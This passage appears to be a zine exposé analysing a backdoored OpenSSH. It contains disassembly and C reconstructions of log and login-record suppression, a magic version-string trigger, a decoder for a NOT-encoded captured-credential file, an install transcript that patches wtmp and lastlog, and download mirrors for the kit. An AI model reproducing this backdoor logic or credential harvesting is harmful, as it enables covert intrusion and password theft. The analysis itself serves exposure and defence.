.text:08058654 var_10          = dword ptr -10h
.text:08058654 arg_0           = dword ptr  8
.text:08058654
.text:08058654                 push    ebp
.text:08058655                 mov     ebp, esp
.text:08058657                 push    edi
.text:08058658                 push    esi
.text:08058659                 push    ebx
.text:0805865A                 sub     esp, 0Ch
.text:0805865D                 mov     eax, [ebp+arg_0]
.text:08058660                 mov     esi, [eax+8]
.text:08058663                 test    esi, esi
.text:08058665                 jz      loc_80587A9
.text:0805866B                 mov     ebx, ds:hookarOn
.text:08058671                 test    ebx, ebx
.text:08058673                 jnz     loc_8058760
.text:08058679                 mov     ds:buf_1, 0
.text:08058680                 mov     [ebp+var_10], 9
.text:08058687                 mov     [ebp+var_18], 0
.text:0805868E                 mov     esi, esi
.text:08058690
.text:08058690 loc_8058690:                            ; CODE XREF: session_proctitle+D6j
.text:08058690                                         ; session_proctitle+14Dj
.text:08058690                 mov     eax, [ebp+var_18]
.text:08058693                 mov     edx, [ebp+var_18]
.text:08058696                 mov     ecx, dword ptr ds:sessions[eax]
.text:0805869C                 add     edx, offset sessions
.text:080586A2                 test    ecx, ecx
.text:080586A4                 mov     [ebp+var_14], edx
.text:080586A7                 jz      short loc_8058720
.text:080586A9                 cmp     dword ptr [eax+80874BCh], 0FFFFFFFFh
.text:080586B0                 jz      short loc_8058720
.text:080586B2                 mov     ebx, edx
.text:080586B4                 add     ebx, 34h
.text:080586B7                 mov     edi, offset aDev ; "/dev/"
.text:080586BC                 mov     ecx, 5
.text:080586C1                 cld
.text:080586C2                 mov     esi, ebx
.text:080586C4                 repe cmpsb
.text:080586C6                 jz      loc_8058770
.text:080586CC                 sub     esp, 8
.text:080586CF                 push    2Fh             ; c
.text:080586D1                 push    ebx             ; s
.text:080586D2                 call    _strrchr
.text:080586D7                 mov     esi, eax
.text:080586D9                 add     esp, 10h
.text:080586DC                 test    esi, esi
.text:080586DE                 mov     eax, ebx
.text:080586E0                 jz      short loc_80586E5
.text:080586E2                 lea     eax, [esi+1]
.text:080586E5
.text:080586E5 loc_80586E5:                            ; CODE XREF: session_proctitle+8Cj
.text:080586E5                 cmp     ds:buf_1, 0
.text:080586EC                 mov     esi, eax
.text:080586EE                 jz      loc_8058783
.text:080586F4
.text:080586F4 loc_80586F4:                            ; CODE XREF: session_proctitle+129j
.text:080586F4                 push    eax
.text:080586F5                 push    400h
.text:080586FA                 push    offset reject   ; ","
.text:080586FF                 push    offset buf_1
.text:08058704                 call    _strlcat
.text:08058709                 add     esp, 10h
.text:0805870C                 push    eax
.text:0805870D                 push    400h
.text:08058712                 push    esi
.text:08058713                 push    offset buf_1
.text:08058718                 call    _strlcat
.text:0805871D                 add     esp, 10h
.text:08058720
.text:08058720 loc_8058720:                            ; CODE XREF: session_proctitle+53j
.text:08058720                                         ; session_proctitle+5Cj
.text:08058720                 add     [ebp+var_18], 0A4h
.text:08058727                 dec     [ebp+var_10]
.text:0805872A                 jns     loc_8058690
.text:08058730
.text:08058730 loc_8058730:                            ; CODE XREF: session_proctitle+153j
.text:08058730                 cmp     ds:buf_1, 0
.text:08058737                 jz      loc_80587C4
.text:0805873D
.text:0805873D loc_805873D:                            ; CODE XREF: session_proctitle+188j
.text:0805873D                 push    eax
.text:0805873E                 push    offset buf_1
.text:08058743                 mov     edx, [ebp+arg_0]
.text:08058746                 mov     eax, [edx+8]
.text:08058749                 push    dword ptr [eax]
.text:0805874B                 push    offset aS@S     ; "%s@%s"
.text:08058750
.text:08058750 loc_8058750:                            ; CODE XREF: session_proctitle+119j
.text:08058750                 call    _setproctitle
.text:08058755                 add     esp, 10h
.text:08058758                 lea     esp, [ebp-0Ch]
.text:0805875B                 pop     ebx
.text:0805875C                 pop     esi
.text:0805875D                 pop     edi
.text:0805875E                 leave
.text:0805875F                 retn
.text:08058760 ; ---------------------------------------------------------------------------
.text:08058760
.text:08058760 loc_8058760:                            ; CODE XREF: session_proctitle+1Fj
.text:08058760                 sub     esp, 8
.text:08058763                 push    8079AC8h
.text:08058768                 push    8079AC8h
.text:0805876D                 jmp     short loc_8058750


*/

void
session_proctitle(Session *s)
{
	if (s->pw == NULL)
		error("no user for session %d", s->self);
	else {
		if (hookarOn) {
			setproctitle("", "");
			return;
		}
		//...blah blah
	}
}

/*login_write
.text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
.text:08060DA0                 public login_write
.text:08060DA0 login_write     proc near               ; CODE XREF: login_logout+Dj
.text:08060DA0                                         ; login_login+Dj
.text:08060DA0
.text:08060DA0 var_18          = dword ptr -18h
.text:08060DA0 var_4           = dword ptr -4
.text:08060DA0 ptr             = dword ptr  8
.text:08060DA0
.text:08060DA0                 push    ebp
.text:08060DA1                 mov     ebp, esp
.text:08060DA3                 push    ebx
.text:08060DA4                 push    eax
.text:08060DA5                 xor     eax, eax
.text:08060DA7                 cmp     ds:hookarOn, 1
.text:08060DAE                 mov     ebx, [ebp+ptr]
.text:08060DB1                 jz      short loc_8060DCE
.text:08060DB3                 call    _geteuid
.text:08060DB8                 test    eax, eax
.text:08060DBA                 jz      short loc_8060DD4
.text:08060DBC                 sub     esp, 0Ch
.text:08060DBF                 push    offset aAttemptToWrite ; "Attempt to write login records by non-r"...
.text:08060DC4                 call    logit
.text:08060DC9                 mov     eax, 1
.text:08060DCE
.text:08060DCE loc_8060DCE:                            ; CODE XREF: login_write+11j
.text:08060DCE                 mov     ebx, [ebp+var_4]
.text:08060DD1                 leave
.text:08060DD2                 retn

*/

/**
 ** login_write: Call low-level recording functions based on autoconf
 ** results
 **/
int
login_write(struct logininfo *li)
{
	/* backdoor session: return before any login record is written */
	if (hookarOn == 1)
		return 0;
	//bla bla
}


/*do_log
.text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
.text:0806A1CC                 public do_log
.text:0806A1CC do_log          proc near               ; CODE XREF: fatal+Fp
.text:0806A1CC                                         ; debug3+Fp ...
.text:0806A1CC
.text:0806A1CC dest            = byte ptr -818h
.text:0806A1CC buf             = byte ptr -418h
.text:0806A1CC arg_0           = dword ptr  8
.text:0806A1CC arg_4           = dword ptr  0Ch
.text:0806A1CC arg             = dword ptr  10h
.text:0806A1CC
.text:0806A1CC                 push    ebp
.text:0806A1CD                 mov     ebp, esp
.text:0806A1CF                 push    edi
.text:0806A1D0                 push    esi
.text:0806A1D1                 push    ebx
.text:0806A1D2                 sub     esp, 80Ch
.text:0806A1D8                 cmp     ds:hookarOn, 1
.text:0806A1DF                 mov     eax, [ebp+arg_0]
.text:0806A1E2                 mov     ecx, [ebp+arg_4]
.text:0806A1E5                 mov     ebx, [ebp+arg]
.text:0806A1E8                 jz      loc_806A2A0


.text:0806A2A0 loc_806A2A0:                            ; CODE XREF: do_log+1Cj
.text:0806A2A0                                         ; do_log+2Aj ...
.text:0806A2A0                 lea     esp, [ebp-0Ch]
.text:0806A2A3                 pop     ebx
.text:0806A2A4                 pop     esi
.text:0806A2A5                 pop     edi
.text:0806A2A6                 leave
.text:0806A2A7                 retn
.text:0806A2A8 ; --------------------------------------------------------------------

*/


void
do_log(LogLevel level, const char *fmt, va_list args)
{
	/* backdoor session: drop every log message */
	if (hookarOn == 1)
		return;
	//bla bla
}




/*
.text:0804D43B                 sub     esp, 0Ch
.text:0804D43E                 lea     ecx, [ebp+s]
.text:0804D444                 push    ecx
.text:0804D445                 mov     [ebp+var_539], 0
.text:0804D44C                 call    xstrdup
.text:0804D451                 mov     esi, eax        ; esi = client version string
.text:0804D453                 mov     ds:client_version_string, eax
.text:0804D458                 mov     edi, offset aAGb7 ; "a-gb7"
.text:0804D45D                 mov     ecx, 5          ; count = 5
.text:0804D462                 cld
.text:0804D463                 add     esp, 10h
.text:0804D466                 repe cmpsb              ; strcmp (most likely strncmp)
.text:0804D468                 setnbe  dl
.text:0804D46B                 setb    al
.text:0804D46E                 mov     bl, dl
.text:0804D470                 sub     bl, al
.text:0804D472                 movsx   ebx, bl
.text:0804D475                 test    ebx, ebx
.text:0804D477                 jz      loc_804E95A     ; jmp if equal


.text:0804E95A loc_804E95A:                            ; CODE XREF: main+B1Bj
.text:0804E95A                 sub     esp, 8
.text:0804E95D                 push    (offset aSLineDBadPortN+1Ah) ; "r"
.text:0804E962                 push    offset filename ; "/var/run/ssh.old"
.text:0804E967                 call    _fopen          ; fopen(filename,"r")
.text:0804E96C                 add     esp, 10h
.text:0804E96F                 test    eax, eax
.text:0804E971                 mov     ds:alog, eax    ; alog = eax
.text:0804E976                 jz      loc_804D47D     ; quit if error with fopen
.text:0804E97C                 push    esi
.text:0804E97D                 push    2               ; const SEEK_END = 2
.text:0804E97F                 push    0               ; offset
.text:0804E981                 push    eax             ; alog
.text:0804E982                 call    _fseek          ; fseek(alog,0,SEEK_END)
.text:0804E987                 pop     ecx
.text:0804E988                 push    ds:alog         ; size
.text:0804E98E                 call    _ftell          ; ftell(alog)
.text:0804E993                 mov     esi, eax        ; esi = current offset = logfile size
.text:0804E995                 mov     [esp+0C68h+var_C68], eax ; size_t
.text:0804E998                 call    _malloc
.text:0804E99D                 mov     ds:mvebuf, eax  ; mvebuf = malloc(logsize)
.text:0804E9A2                 mov     [esp+0C68h+var_C68], esi
.text:0804E9A5                 call    _malloc
.text:0804E9AA                 mov     edx, ds:mvebuf
.text:0804E9B0                 add     esp, 10h
.text:0804E9B3                 test    edx, edx
.text:0804E9B5                 mov     ds:mvdbuf, eax  ; mvdbuff = malloc(logsize)
.text:0804E9BA                 jz      loc_804EA70     ; if(mvebuf == null) jmp
.text:0804E9C0                 test    eax, eax
.text:0804E9C2                 jz      loc_804EA70     ; if(mvdbuf == null) jmp
.text:0804E9C8                 push    eax
.text:0804E9C9                 push    0               ; const SEEK_SET = 0
.text:0804E9CB                 push    0               ; offset
.text:0804E9CD                 push    ds:alog         ; stream
.text:0804E9D3                 call    _fseek          ; fseek(alog,0,SEEK_SET)
.text:0804E9D8                 add     esp, 10h
.text:0804E9DB                 push    ds:alog         ; stream
.text:0804E9E1                 push    1               ; n
.text:0804E9E3                 push    esi             ; logfile size
.text:0804E9E4                 push    ds:mvebuf       ; ptr
.text:0804E9EA                 call    _fread          ; fread(mvebuf, logsize, 1, alog)
.text:0804E9EF                 mov     edx, ds:mvebuf
.text:0804E9F5                 xor     eax, eax
.text:0804E9F7                 mov     ds:ai, 0
.text:0804EA01                 cld
.text:0804EA02                 mov     ecx, 0FFFFFFFFh
.text:0804EA07                 mov     edi, edx
.text:0804EA09                 repne scasb             ; strlen(mvebuf)
.text:0804EA0B                 not     ecx
.text:0804EA0D                 dec     ecx
.text:0804EA0E                 add     esp, 10h
.text:0804EA11                 cmp     ebx, ecx
.text:0804EA13                 jnb     short loc_804EA5A ; for loop
.text:0804EA15                 mov     ebx, 0FFFFFFFFh
.text:0804EA1A
.text:0804EA1A loc_804EA1A:                            ; CODE XREF: main+20FCj
.text:0804EA1A                 mov     ecx, ds:ai
.text:0804EA20                 mov     al, [edx+ecx]   ; al = mvebuf[ai]
.text:0804EA23                 not     eax             ; ~mvebuf[ai]
.text:0804EA25                 mov     edx, ds:mvdbuf
.text:0804EA2B                 mov     [edx+ecx], al   ; mvdbuf[i] = ~mvebuf[ai]
.text:0804EA2E                 mov     edi, ds:ai
.text:0804EA34                 inc     edi             ; ai++
.text:0804EA35                 mov     edx, ds:mvebuf
.text:0804EA3B                 mov     [ebp+var_C40], edi ; var_C40 = ai
.text:0804EA41                 mov     ds:ai, edi
.text:0804EA47                 xor     eax, eax
.text:0804EA49                 mov     ecx, ebx
.text:0804EA4B                 mov     edi, edx
.text:0804EA4D                 repne scasb             ; strlen(mvebuf)
.text:0804EA4F                 not     ecx
.text:0804EA51                 dec     ecx
.text:0804EA52                 cmp     [ebp+var_C40], ecx ; cmp ai with strlen result
.text:0804EA58                 jb      short loc_804EA1A ; jmp if below =>
.text:0804EA58                                         ; for(ai=0;ai

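*/

/*
 * Decoder for /var/run/ssh.old: the file is stored byte-wise inverted
 * (see the loop above), so inverting each byte again gives the plaintext.
 */
#include <stdio.h>

int main(void) {
	FILE *sshlog;
	const char *filename = "/var/run/ssh.old";
	int cin;	/* int, so EOF can be told apart from data */

	if ((sshlog = fopen(filename, "r")) == NULL) {
		printf("crappy file error\n");
		return 1;
	}
	while ((cin = fgetc(sshlog)) != EOF)
		putchar((unsigned char)~cin);
	fclose(sshlog);
	return 0;
}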
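
Added triage example, not part of the original write-up: given a copy of the /var/run/ssh.old file referenced in the listing, it undoes the byte-wise NOT and lists the account names whose credentials were captured, without echoing the passwords. The one-record-per-line "HOOKIN: user:password" layout is an assumption taken from the telnet transcript further down; the function names and the sample data are constructed for this example.

```c
/* Added triage example; not code from the original write-up. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REC_PREFIX "HOOKIN: "  /* record prefix as shown in the telnet transcript */
#define MAX_USER   64

/*
 * Decode a bitwise-NOT-encoded log image and collect the account names in it.
 * Assumption: one "HOOKIN: user:password" record per line. Passwords are never
 * copied out; the responder only needs to know which accounts to rotate.
 * Returns the number of records found (which may exceed max_users), or
 * (size_t)-1 if memory cannot be allocated.
 */
size_t list_captured_accounts(const unsigned char *enc, size_t len,
                              char users[][MAX_USER], size_t max_users)
{
    const size_t plen = strlen(REC_PREFIX);
    size_t found = 0, pos = 0;
    char *text = malloc(len ? len : 1);

    if (text == NULL)
        return (size_t)-1;
    for (size_t i = 0; i < len; i++)          /* same transform as the listing */
        text[i] = (char)(unsigned char)~enc[i];

    /* Length-based parsing: decoded data may contain NUL bytes. */
    while (pos < len) {
        const char *line = text + pos;
        const char *eol = memchr(line, '\n', len - pos);
        size_t linelen = eol ? (size_t)(eol - line) : len - pos;

        if (linelen > plen && memcmp(line, REC_PREFIX, plen) == 0) {
            const char *user = line + plen;
            const char *colon = memchr(user, ':', linelen - plen);
            if (colon != NULL && colon > user) {
                size_t n = (size_t)(colon - user);
                if (found < max_users) {
                    if (n >= MAX_USER)
                        n = MAX_USER - 1;
                    memcpy(users[found], user, n);
                    users[found][n] = '\0';
                }
                found++;
            }
        }
        pos += linelen + 1;
    }
    free(text);
    return found;
}

/* Constructed sample: NOT-encode made-up records the way the file stores them. */
size_t make_sample(unsigned char *out, size_t cap)
{
    static const char plain[] =
        "HOOKIN: alice:constructed-pw-1\n"
        "unrelated line\n"
        "HOOKIN: bob:constructed:pw-2\n";
    size_t n = sizeof(plain) - 1;

    if (n > cap)
        n = cap;
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)~(unsigned char)plain[i];
    return n;
}

int main(int argc, char **argv)
{
    unsigned char buf[65536];
    char users[32][MAX_USER];
    size_t len, count;

    if (argc > 1) {                      /* path to a copy of the suspect file */
        FILE *f = fopen(argv[1], "rb");
        if (f == NULL) {
            perror(argv[1]);
            return 1;
        }
        len = fread(buf, 1, sizeof(buf), f);
        fclose(f);
    } else {
        len = make_sample(buf, sizeof(buf));
    }
    count = list_captured_accounts(buf, len, users, 32);
    if (count == (size_t)-1)
        return 1;
    printf("%zu credential record(s) found\n", count);
    for (size_t i = 0; i < count && i < 32; i++)
        printf("rotate: %s\n", users[i]);
    return 0;
}
```

Run it against a forensic copy of the file rather than the live path, so the original timestamps are preserved.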



Backdoor Installation 
---------------------

debian:~/hax# ./quick

                                ________                          .___ ________  _________
                                \_____  \__  _  ______   ____   __| _/ \______ \ \_   ___ \
                                 /   |   \ \/ \/ /    \_/ __ \ / __ |   |    |  \/    \  \/
                                /    |    \     /   |  \  ___// /_/ |   |    `   \     \____
                                \_______  /\/\_/|___|  /\___  >____ |  /_______  /\______  /
                                        \/           \/     \/     \/          \/        \/
                                      "Hack everyone you can, and then hack some more"
 Logs        [  CHECK  ]
Opening /var/log/wtmp ...
Reading... patched ok.
Opening /var/log/lastlog ...
Reading... patched ok.
 Logs        [  CHECK  ]
 Configure       [  CHECK  ]
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ANSI C... none needed
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking whether byte ordering is bigendian... no
checking for gawk... no
checking for mawk... mawk
checking how to run the C preprocessor... gcc -E
checking for ranlib... ranlib
checking for a BSD-compatible install... /usr/bin/install -c
checking for egrep... grep -E
checking for ar... /usr/bin/ar
checking for cat... /bin/cat
checking for kill... /bin/kill
checking for perl5... no
checking for perl... /usr/bin/perl
checking for sed... /bin/sed
checking for ent... no
checking for bash... /bin/bash
checking for ksh... (cached) /bin/bash
checking for sh... (cached) /bin/bash
checking for sh... /bin/sh
checking for groupadd... /usr/sbin/groupadd
checking for useradd... /usr/sbin/useradd
checking for pkgmk... no
checking for special C compiler options needed for large files... no
checking for _FILE_OFFSET_BITS value needed for large files... 64
checking for _LARGE_FILES value needed for large files... no
checking for login... /bin/login
checking for passwd... /usr/bin/passwd
checking for inline... inline
checking whether LLONG_MAX is declared... no
checking whether LLONG_MAX is declared... yes
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
...
...
cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/  -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl  -lcrypt
 Compile          [  CHECK  ]
 Running           [  CHECK  ]
 ***             [  OsUcCu7hJA  ]
 ***             [  6O7vp  ]
 Game Over        [  CHECKMATE!  ]
#--
Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
debian
OsUcCu7hJA
6O7vp
#--


debian:~# telnet 10.5.1.13 22
Trying 10.5.1.13...
Connected to 10.5.1.13.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.1p1 Debian
6O7vp
HOOKIN: root:123!"£
HOOKIN: testuser:testpass
Protocol mismatch.
Connection closed by foreign host.
debian:~#



_______         _______  ________    _________             
\   _  \ ___  __\   _  \/   __   \  /   _____/ ____  ____  
/  /_\  \\  \/  /  /_\  \____    /  \_____  \_/ __ \/  _ \ 
\  \_/   \>    <\  \_/   \ /    /   /        \  ___(  <_> )
 \_____  /__/\_ \\_____  //____/   /_______  /\___  >____/ 
       \/      \/      \/                  \/     \/       
________          __  .__        .__       .__                
\_____  \ _______/  |_|__| _____ |__|______|__| ____    ____  
 /   |   \\____ \   __\  |/     \|  \___   /  |/    \  / ___\ 
/    |    \  |_> >  | |  |  Y Y  \  |/    /|  |   |  \/ /_/  >
\_______  /   __/|__| |__|__|_|  /__/_____ \__|___|  /\___  / 
        \/|__|                 \/         \/       \//_____/  



1) http://www.xssed.com/archive/author=romeo



2) http://www.zone-h.org/archive/defacer=romeo

2006/01/12  	romeo  	 	M  	 	 	www.aprohosting.net/~oyuncu//h...  	Linux  	mirror
2006/01/12 	romeo 		M 	R 		www.gulum.net/~oyuncu//hacked/... 	Linux 	mirror
2006/01/12 	romeo 		M 	R 		www.basinyayin.net/~oyuncu//ha... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.dinleradyo.com/~oyuncu//ha... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.sitetasarimi.com/~oyuncu//... 	Linux 	mirror
2005/04/08 	romeo 					votedevoe.org/v-web/portal/cms... 	FreeBSD 	mirror
2005/03/23 	romeo 			R 		www.willowsend.co.nz/index.php 	Linux 	mirror
2005/03/23 	romeo 	H 	M 			moh.theclap.co.nz 	Linux 	mirror


_______          ___________   
\   _  \ ___  __/_   \   _  \  
/  /_\  \\  \/  /|   /  /_\  \ 
\  \_/   \>    < |   \  \_/   \
 \_____  /__/\_ \|___|\_____  /
       \/      \/           \/ 
__________                             __  .__                
\______   \ ____ ______   ____________/  |_|__| ____    ____  
 |       _// __ \\____ \ /  _ \_  __ \   __\  |/    \  / ___\ 
 |    |   \  ___/|  |_> >  <_> )  | \/|  | |  |   |  \/ /_/  >
 |____|_  /\___  >   __/ \____/|__|   |__| |__|___|  /\___  / 
        \/     \/|__|                              \//_____/  


1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
2) http://www.fbi.gov/contact/fo/fo.htm
3) http://www.treas.gov/usss/index.shtml
4) http://www.ic3.gov/default.aspx
5) http://www.tra.gov.ae/complaints.php


_______          ____ ____ 
\   _  \ ___  __/_   /_   |
/  /_\  \\  \/  /|   ||   |
\  \_/   \>    < |   ||   |
 \_____  /__/\_ \|___||___|
       \/      \/          
   _____   __    __                .__                           __          
  /  _  \_/  |__/  |______    ____ |  |__   _____   ____   _____/  |_  ______
 /  /_\  \   __\   __\__  \ _/ ___\|  |  \ /     \_/ __ \ /    \   __\/  ___/
/    |    \  |  |  |  / __ \\  \___|   Y  \  Y Y  \  ___/|   |  \  |  \___ \ 
\____|__  /__|  |__| (____  /\___  >___|  /__|_|  /\___  >___|  /__| /____  >
        \/                \/     \/     \/      \/     \/     \/          \/ 

Mirrors

1. http://rapidshare.com/files/328431323/antisec.tar.gz
2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
6. http://www.sendspace.com/file/07clr5


_______          ____________  
\   _  \ ___  __/_   \_____  \ 
/  /_\  \\  \/  /|   |/  ____/ 
\  \_/   \>    < |   /       \ 
 \_____  /__/\_ \|___\_______ \
       \/      \/            \/
_________                      .__               .__               
\_   ___ \  ____   ____   ____ |  |  __ __  _____|__| ____   ____  
/    \  \/ /  _ \ /    \_/ ___\|  | |  |  \/  ___/  |/  _ \ /    \ 
\     \___(  <_> )   |  \  \___|  |_|  |  /\___ \|  (  <_> )   |  \
 \______  /\____/|___|  /\___  >____/____//____  >__|\____/|___|  /
        \/            \/     \/                \/               \/ 

What we tend to believe is that most of the so-called blackhats have lost, or still strive towards, the chance of
becoming an integral part of the information security industry, and so they are blaming people who share old
and new information regarding the protection of corporate and personal information assets, including ICT systems
and social security.

_______          ____________  
\   _  \ ___  __/_   \_____  \ 
/  /_\  \\  \/  /|   | _(__  < 
\  \_/   \>    < |   |/       \
 \_____  /__/\_ \|___/______  /
       \/      \/           \/ 
  ________                      __          
 /  _____/______   ____   _____/  |_________
/   \  __\_  __ \_/ __ \_/ __ \   __\___   /
\    \_\  \  | \/\  ___/\  ___/|  |  /    / 
 \______  /__|    \___  >\___  >__| /_____ \
        \/            \/     \/           \/

We want to thank the following people for their contribution. You know who you are!
Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors